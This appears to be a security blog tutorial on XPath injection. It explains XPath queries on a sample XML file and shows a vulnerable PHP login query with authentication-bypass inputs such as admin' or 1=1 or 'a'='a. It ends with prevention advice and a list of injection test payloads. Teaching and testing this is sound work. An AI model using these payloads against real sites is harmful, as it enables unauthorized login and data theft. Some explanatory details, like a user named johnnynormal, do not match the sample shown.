XPath injection attacks occur when a web site uses user-supplied information to construct an XPath query for XML data. XPath is a standard language for selecting nodes in an XML document. When a web site stores its content in XML, it is common to accept some form of input on the query string to identify the content to locate and display on the page.

By sending intentionally malformed input to the web site, an attacker can find out how the XML data is structured, or access data that they would not normally be able to access.

XML is queried with XPath expressions, short descriptive statements that locate a piece of information in the document.

This input must be sanitized so that it cannot change the structure of the XPath query and make it return data it was not meant to return. No access controls can be implemented within the XML document itself. Consequently, the entire XML document can be read out in the event of an XPath injection.


What is XPATH?

XPath is a major element in the XSLT standard. XPath can be used to navigate through elements and attributes in an XML document.

[Figure: the XML document displayed as a tree]

The following table describes what each XPath query selects in the XML sample shown in the figure.

XPath query: /accounts
Result: The root node accounts is selected.

XPath query: //user
Result: All nodes with the name 'user' are selected.

XPath query: /accounts/user
Result: All user nodes that are child nodes of the accounts node are selected.

XPath query: /accounts/user[username='1337h4x0r']
Result: The user node that includes the user name 1337h4x0r is returned. An absolute path starts with /.

XPath query: //user[email='john@company.com']
Result: The user node that includes the e-mail address john@company.com is returned. A relative path starts with //. This selects all nodes that meet the condition(s) set, no matter where in the tree the nodes are located.

XPath query: /accounts/child::node()
Result: This selects all child nodes of the accounts node.

XPath query: //user[position()=n]
Result: This selects the user node at the given position. Warning: the index starts at 1, not 0; in the sample this selects the node of the user johnnynormal.

XPATH Example


<?xml version="1.0" encoding="UTF-8"?>
<accounts>
<user category="user1">
<username>vry4n</username>
<firstname>Bryan</firstname>
<email>notyourbusiness@vk9-sec.com</email>
</user>
<user category="user2">
</user>
<system category="sys1">
<os>windows</os>
<version>Windows Server 2008</version>
</system>
<system category="sys2">
<os>linux</os>
<version>Ubuntu Server</version>
</system>
</accounts>


Basic queries


1. Select the root node "accounts" and print its contents. Note that only one element is returned, and it contains the whole document.

  • /accounts

2. Select the child nodes by name. Each query now prints 2 elements.

  • /accounts/user
  • //user

  • /accounts/system
  • //system
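
The basic queries above can be tried out with Python's standard library. This is only a sketch: `xml.etree.ElementTree` implements a limited subset of XPath and only accepts paths relative to an element, so `/accounts/user` is written as `user` from the root and `//user` as `.//user`. The sample document is a hypothetical reconstruction of the one in this article, and the values of the second user are invented.

```python
import xml.etree.ElementTree as ET

# Hypothetical sample shaped like the article's document.
# The second user's values are invented for illustration.
SAMPLE = """<accounts>
  <user category="user1">
    <username>vry4n</username>
    <firstname>Bryan</firstname>
    <email>notyourbusiness@vk9-sec.com</email>
  </user>
  <user category="user2">
    <username>guest</username>
    <firstname>Guest</firstname>
    <email>guest@example.com</email>
  </user>
  <system category="sys1">
    <os>windows</os>
    <version>Windows Server 2008</version>
  </system>
  <system category="sys2">
    <os>linux</os>
    <version>Ubuntu Server</version>
  </system>
</accounts>"""

root = ET.fromstring(SAMPLE)  # root is the <accounts> element (/accounts)

users = root.findall("user")              # /accounts/user
users_anywhere = root.findall(".//user")  # //user
systems = root.findall("system")          # /accounts/system
emails = [e.text for e in root.findall("user/email")]  # /accounts/user/email

print(root.tag)
print(len(users), len(users_anywhere), len(systems))
print(emails)
```

Both forms of the user query return the same two elements here because every user node is a direct child of the root.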

Select a specific child element (email) of every user node

  • /accounts/user/email

Filtering Queries

Select a child node that has vry4n as username

  • /accounts/user[username="vry4n"]
  • //user[username="vry4n"]

Select a child node that has windows as os

  • /accounts/system[os="windows"]
  • //system[os="windows"]

Select the system node whose category attribute is sys1

  • /accounts/system[@category="sys1"]
  • //system[@category="sys1"]

Example 2: an attribute filter written with the attribute:: axis

  • /accounts/user[attribute::category="user2"]
  • //user[attribute::category="user2"]
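
As a rough illustration of the filtering queries above, the same predicates can be run with `xml.etree.ElementTree`. This is a sketch under assumptions: the sample document is a hypothetical, shortened version of the article's, the paths are relative to the root element, and the long `attribute::` axis is not supported by this library, so the abbreviated `@category` form is used instead.

```python
import xml.etree.ElementTree as ET

# Hypothetical, shortened sample; the second user's name is invented.
SAMPLE = """<accounts>
  <user category="user1"><username>vry4n</username></user>
  <user category="user2"><username>guest</username></user>
  <system category="sys1"><os>windows</os></system>
  <system category="sys2"><os>linux</os></system>
</accounts>"""

root = ET.fromstring(SAMPLE)

# /accounts/user[username="vry4n"]
by_name = root.findall("user[username='vry4n']")
# /accounts/system[os="windows"]
windows = root.findall("system[os='windows']")
# /accounts/system[@category="sys1"]
sys1 = root.findall("system[@category='sys1']")
# /accounts/user[attribute::category="user2"], abbreviated form
user2 = root.findall("user[@category='user2']")

for label, nodes in [("by_name", by_name), ("windows", windows),
                     ("sys1", sys1), ("user2", user2)]:
    print(label, [n.get("category") for n in nodes])
```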

Select all child nodes, under accounts root node

  • /accounts/child::node()

Filter child nodes, within user nodes

  • /accounts/user/child::node()
  • //user/child::node()

Select only the system child nodes, using the child:: axis

  • /accounts/child::system
  • //child::system

Select the child nodes of a specific user node

  • /accounts/user[username="vry4n"]/child::node()
  • //user[username="vry4n"]/child::node()
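
The child-axis queries above have rough equivalents in `xml.etree.ElementTree`, sketched below. Two assumptions apply: the sample document is a hypothetical, shortened version of the article's, and the library's `*` step stands in for `child::node()`. The two are not identical, because `child::node()` also returns text nodes while `*` returns element children only.

```python
import xml.etree.ElementTree as ET

# Hypothetical, shortened sample; the second user's values are invented.
SAMPLE = """<accounts>
  <user category="user1">
    <username>vry4n</username>
    <firstname>Bryan</firstname>
    <email>notyourbusiness@vk9-sec.com</email>
  </user>
  <user category="user2">
    <username>guest</username>
    <firstname>Guest</firstname>
    <email>guest@example.com</email>
  </user>
  <system category="sys1"><os>windows</os></system>
  <system category="sys2"><os>linux</os></system>
</accounts>"""

root = ET.fromstring(SAMPLE)

# /accounts/child::node() (element children only)
top_level = [child.tag for child in root.findall("*")]
# /accounts/user/child::node()
user_fields = [child.tag for child in root.findall("user/*")]
# /accounts/child::system
system_nodes = root.findall("system")
# /accounts/user[username="vry4n"]/child::node()
vry4n_fields = [child.tag for child in root.findall("user[username='vry4n']/*")]

print(top_level)
print(user_fields)
print(len(system_nodes))
print(vry4n_fields)
```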

Filter by position

  • /accounts/user[position()=2]
  • //user[position()=2]

Filter by position (abbreviated syntax)

  • /accounts/user[2]
  • //user[2]

Filter by last position

  • /accounts/system[last()]
  • //system[last()]
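
Positional filters can be sketched the same way. `xml.etree.ElementTree` understands the abbreviated `[2]` and `[last()]` predicates but not the `position()=2` form, so only the abbreviated forms appear here. The sample document is a hypothetical, shortened version of the article's.

```python
import xml.etree.ElementTree as ET

# Hypothetical, shortened sample; the second user's name is invented.
SAMPLE = """<accounts>
  <user category="user1"><username>vry4n</username></user>
  <user category="user2"><username>guest</username></user>
  <system category="sys1"><os>windows</os></system>
  <system category="sys2"><os>linux</os></system>
</accounts>"""

root = ET.fromstring(SAMPLE)

# /accounts/user[2] : positions start at 1, so this is the second user
second_user = root.findall("user[2]")
# /accounts/system[last()] : the last system node
last_system = root.findall("system[last()]")

print([u.get("category") for u in second_user])
print([s.get("category") for s in last_system])
```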

Some Functions


1. Count the nodes that a query selects. In this case the result is 2, one for each user node ("user1" and "user2").


  • count(//user)
  • count(/accounts/user)


Returns the length of a specified string


  • string-length(/accounts/user[1]/email)


Returns the substring that begins at the start position and has the specified length. The first character is at position 1. With the email notyourbusiness@vk9-sec.com, the result is notyour.


  • substring(/accounts/user[1]/email,1,7)


Returns true if string1 starts with string2. In this case the username is vry4n, so the result is true. The second argument is a string literal and must be quoted.

  • starts-with(//user[1]/username,'v')


Returns true if string1 contains string2. In this case the username is vry4n, so the result is true.

  • contains(//user[1]/username,'r')

String & number

Returns the string value of the argument

  • string(//user[1]/username)

number() converts its argument to a number. If the value is not numeric, as with the username vry4n, the result is NaN (not a number) rather than false.

  • number(//user[1]/username)
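
Python's standard library does not evaluate XPath functions, so the sketch below only mirrors their behavior with plain Python on values fetched through `xml.etree.ElementTree`. The helper `xpath_number` and the shortened sample document are hypothetical; they are meant to show what each function returns, not how an XPath engine implements it.

```python
import math
import re
import xml.etree.ElementTree as ET

# Hypothetical, shortened sample; the second user's values are invented.
SAMPLE = """<accounts>
  <user category="user1">
    <username>vry4n</username>
    <email>notyourbusiness@vk9-sec.com</email>
  </user>
  <user category="user2">
    <username>guest</username>
    <email>guest@example.com</email>
  </user>
</accounts>"""

root = ET.fromstring(SAMPLE)
username = root.findtext("user[1]/username")  # string(//user[1]/username)
email = root.findtext("user[1]/email")

# XPath 1.0 numbers: optional minus sign, digits, optional fraction.
NUMBER_RE = re.compile(r"\s*-?(\d+(\.\d*)?|\.\d+)\s*")

def xpath_number(text):
    """Mirror number(): a float, or NaN when the text is not numeric."""
    if text is not None and NUMBER_RE.fullmatch(text):
        return float(text)
    return math.nan

count = len(root.findall(".//user"))  # count(//user)
length = len(email)                   # string-length(/accounts/user[1]/email)
prefix = email[0:7]                   # substring(/accounts/user[1]/email,1,7)
starts = username.startswith("v")     # starts-with(//user[1]/username,'v')
has_r = "r" in username               # contains(//user[1]/username,'r')
as_number = xpath_number(username)    # number(//user[1]/username)

print(count, length, prefix, starts, has_r, as_number)
```

Note the index shift in `prefix`: XPath counts characters from 1, Python slices from 0.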

Exploitation example

<Employee ID="1">
<Signature>g0t r00t?</Signature>
</Employee>

<Employee ID="2">
<Signature>Zombie Films Rock!</Signature>
</Employee>

<Employee ID="3">
<Signature>I like the smell of confunk</Signature>
</Employee>

Example of a query that a script uses to retrieve data

In this example, an authentication mechanism accepts a username and a password.

PHP code


  • $lXPathQueryString = "//Employee[UserName='{USERNAME}' and Password='{PASSWORD}']";


1. A regular login, here with admin as both username and password, constructs the following query

  • $lXPathQueryString = "//Employee[UserName='admin' and Password='admin']";

2. By injecting XPath syntax into this query we can modify its behavior and make it return the whole database. To test whether a field is injectable:

  • insert a single quote (') in the field to be tested, which introduces a syntax error in the query
  • check whether the application returns an error message.

Username: admin' or 1=1 or 'a'='a

Password: admin123

  • $lXPathQueryString = "//Employee[UserName='admin' or 1=1 or 'a'='a' and Password='admin123']";

Because "and" binds more tightly than "or", the predicate is evaluated as UserName='admin' or 1=1 or ('a'='a' and Password='admin123'). Only one of the "or" branches needs to be true, and 1=1 is always true, so the password part becomes irrelevant and the predicate matches ALL employees.

3. To show the results for a single user, if it exists

Username: admin' or 'a'='a

  • $lXPathQueryString = "//Employee[UserName='admin' or 'a'='a' and Password='admin123']";

Here the user admin matches regardless of the password, because the password check only applies to the second "or" branch.

The password can also be text' or '1' = '1

  • $lXPathQueryString = "//Employee[UserName='admin' or 'a'='a' and Password='text' or '1' = '1']";
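
The way these payloads reshape the query can be reproduced with a few lines of string handling. The sketch below is written in Python rather than PHP and does not evaluate the XPath; `build_query` and `injected_predicate` are hypothetical helpers that imitate the unsafe template substitution and the resulting boolean logic. Python's `and` also binds more tightly than `or`, which makes the mirror straightforward.

```python
TEMPLATE = "//Employee[UserName='{USERNAME}' and Password='{PASSWORD}']"

def build_query(username, password):
    """Unsafe on purpose: user input is pasted into the expression as-is."""
    return TEMPLATE.format(USERNAME=username, PASSWORD=password)

normal = build_query("admin", "admin")
bypass_all = build_query("admin' or 1=1 or 'a'='a", "admin123")
bypass_pw = build_query("admin' or 'a'='a", "text' or '1' = '1")

def injected_predicate(user_name, password):
    """Mirror of the predicate inside bypass_all for one employee record."""
    return user_name == "admin" or 1 == 1 or ("a" == "a" and password == "admin123")

print(normal)
print(bypass_all)
print(bypass_pw)
# The record values here are invented; any values give the same answer.
print(injected_predicate("someone", "secret"))
```

The injected quotes close the string literal early, so the rest of the input is parsed as XPath operators instead of data.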


XPath injection attacks are much like SQL injection attacks, and most of the preventive measures are the same ones used against other typical code injection attacks.

  • Input validation: one of the best measures to defend applications against XPath injection attacks. The developer has to ensure that the application accepts only legitimate input.
  • Parameterization: in parameterized queries, the query is precompiled and user input is passed as parameters instead of being embedded in the expression.
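
A minimal sketch of both ideas follows, in Python. It is not a real parameterized XPath API: the standard library has none, so the lookup instead uses a fixed path and compares the user's values as plain data, which has the same effect of keeping input out of the expression. The employee records, the allowlist pattern, and the helper names `is_valid_username` and `authenticate` are all hypothetical.

```python
import re
import xml.etree.ElementTree as ET

# Hypothetical records; names and passwords are invented for illustration.
EMPLOYEES = """<Employees>
  <Employee ID="1"><UserName>admin</UserName><Password>adminpass</Password></Employee>
  <Employee ID="2"><UserName>guest</UserName><Password>guestpass</Password></Employee>
</Employees>"""

# Allowlist: letters, digits and a few harmless symbols, 1 to 64 characters.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")

def is_valid_username(value):
    """Input validation: accept only values made of allowlisted characters."""
    return USERNAME_RE.fullmatch(value) is not None

def authenticate(root, username, password):
    """Return the matching Employee element, or None.

    The path is a constant and the user's values are compared as data,
    so quotes in the input cannot change the structure of the query.
    """
    if not is_valid_username(username):
        return None
    for employee in root.findall("Employee"):
        if (employee.findtext("UserName") == username
                and employee.findtext("Password") == password):
            return employee
    return None

root = ET.fromstring(EMPLOYEES)
print(authenticate(root, "admin", "adminpass") is not None)
print(authenticate(root, "admin' or 1=1 or 'a'='a", "admin123"))
print(authenticate(root, "admin", "text' or '1' = '1"))
```

The first injected login is rejected by validation; the second passes validation but fails the comparison, because the password is never interpreted as XPath.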

Most sites have a way to store data, the most common of which is a database. However, some sites store data in XML and query it with XPath. The following payloads are commonly used to test such sites for XPath injection:


  • ' or '1'='1
  • ' or ''='
  • x' or 1=1 or 'x'='y
  • /
  • //
  • //*
  • */*
  • @*
  • count(/child::node())
  • x' or name()='username' or 'x'='y
  • ' and count(/*)=1 and '1'='1
  • ' and count(/@*)=1 and '1'='1
  • ' and count(/comment())=1 and '1'='1
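
Most of the quote-based payloads above work by closing a string literal early. When input has to be embedded in an expression anyway, one commonly used technique, which is not taken from this article, is to build a quoted literal that the input cannot escape from. XPath 1.0 has no escape character, so values containing both quote types are split and joined with concat(). The helper name `xpath_literal` is hypothetical and this is only a sketch.

```python
def xpath_literal(value):
    """Return value as an XPath 1.0 string literal it cannot break out of."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    # Both quote types present: split on single quotes and re-join the
    # pieces with a double-quoted single quote inside concat().
    pieces = ["'" + piece + "'" for piece in value.split("'")]
    return "concat(" + ", \"'\", ".join(pieces) + ")"

payloads = ["' or '1'='1", "x' or 1=1 or 'x'='y", "admin"]
for payload in payloads:
    print("//Employee[UserName=" + xpath_literal(payload) + "]")

print(xpath_literal("a'b\"c"))
```

Each payload ends up inside a single literal, so an engine would compare it against UserName as text instead of parsing it as operators.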